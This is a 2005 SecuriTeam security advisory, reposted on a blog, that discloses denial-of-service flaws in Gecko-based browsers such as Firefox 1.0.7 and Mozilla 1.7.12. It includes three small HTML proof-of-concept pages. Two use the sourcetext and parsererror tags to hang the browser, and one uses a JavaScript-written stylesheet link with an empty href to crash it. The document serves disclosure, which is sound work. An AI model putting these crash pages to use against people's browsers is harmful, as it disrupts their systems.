Thursday, October 20, 2005

[NEWS] Gecko Based Browsers Multiple DoS Vulnerabilities (parsererror, sourcetext, stylesheet)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

Gecko Based Browsers Multiple DoS Vulnerabilities (parsererror,
sourcetext, stylesheet)
------------------------------------------------------------------------

SUMMARY

The Gecko engine does not handle specific tags correctly, and does not
validate links correctly, allowing attackers to cause DoS on the machine
running the Gecko engine.

DETAILS

Vulnerable Systems:
* Netscape Browser version 8.0.3.3
* Netscape version 7.2
* K-Meleon version 0.9
* Firefox version 1.0.7 and prior
* Mozilla suite version 1.7.12 and prior

Tag handling:
The Gecko engine is vulnerable for a DoS when managing two tags:
* <sourcetext>
* <parsererror>

By using one of this tags, it is possible to cause the system to hang with
100% CPU, and only by killing the application.

Proof of Concept 1:
< html>
< head>
< title>sourcetext element test< /title>
< /head>
< body>
< p>< sourcetext>< /sourcetext>< /p>
< /body>
< /html>

Proof of Concept 2:
< html>
< head>
< title>parsererror element test< /title>
< /head>
< body>
< p>< parsererror>< /parsererror>< /p>
< /body>
< /html>

Javascript link:
By adding link tag using Javascript, with empty not complete href
statement, it is possible to cause Gecko based web browsers to crash.

Proof of Concept:
< !-- Brought to you By Kubbo. Now bring Kubbo the walrus; Goo-goo-gajoob.
-- >

< html>
< script language="JavaScript">
document.write('< link rel="stylesheet" href="http://">');
< /script>
< /html>

< !-- Affects Firefox 1.0.7 and below. Adaras ron r farliga. -->

ADDITIONAL INFORMATION

The information has been provided by <mailto:juha-matti.laurio@netti.fi>
Juha-Matti Laurio .
The bug report can be found at:
<https://bugzilla.mozilla.org/show_bug.cgi?id=210658>
https://bugzilla.mozilla.org/show_bug.cgi?id=210658
The Proof of Concept of Tag Handling can be found at:
<http://www.milw0rm.com/id.php?id=1253>
http://www.milw0rm.com/id.php?id=1253
The Proof of Concept of link tag can be found at:
<http://www.milw0rm.com/id.php?id=1257>
http://www.milw0rm.com/id.php?id=1257

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

No comments:

Post a Comment